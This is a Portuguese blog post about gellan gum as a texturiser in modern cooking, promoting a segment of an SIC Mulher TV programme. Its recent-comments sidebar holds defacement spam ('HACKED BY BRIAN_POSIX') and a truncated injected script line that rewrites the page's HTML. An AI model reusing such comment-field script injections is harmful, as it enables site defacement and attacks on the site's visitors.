O Gelano é um ingrediente chave em vários pratos produzidos por chefs mais modernos, resultado de uma aproximação racional e baseada na investigação, que deu origem a aplicações interessantes e invulgares deste ingrediente.


O Gelano é um hidrato de carbono utilizado na indústria alimentar e cozinha moderna, como texturante (espessante, gelificante, etc). No mercado doméstico e gourmet, existem vários tipos de gelano disponíveis de marcas diferentes, com características e propriedades também diferentes.
Não é digerido nem absorvido pelo intestino humano, e também não é degradado pelas bactérias do tracto intestinal, comporta-se assim, do ponto de vista nutricional, como uma fibra alimentar. Isto significa que apresenta uma fraca digestibilidade e um valor energético baixo.
                                                                           
O gelano do tipo “F” (marca MBK), é por assim dizer o mais irreverente da linha de gelanos e que permite a realização de resultados mais fantásticos. Tem uma propriedade muito interessante, a de produzir géis fluidos ou líquidos (“gelatinas” que parecem líquidos, mas que na realidade são constituídas por uma rede 3D). Outra propriedade interessante que é a de não se fundir a altas temperaturas, permitindo a confecção de um gelado “flambeado”, cujo exterior fica quente quando incendiado, enquanto que o interior se mantém congelado e frio, mas mantendo sempre a forma.

 

Não perca estas apetitosas novidades no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO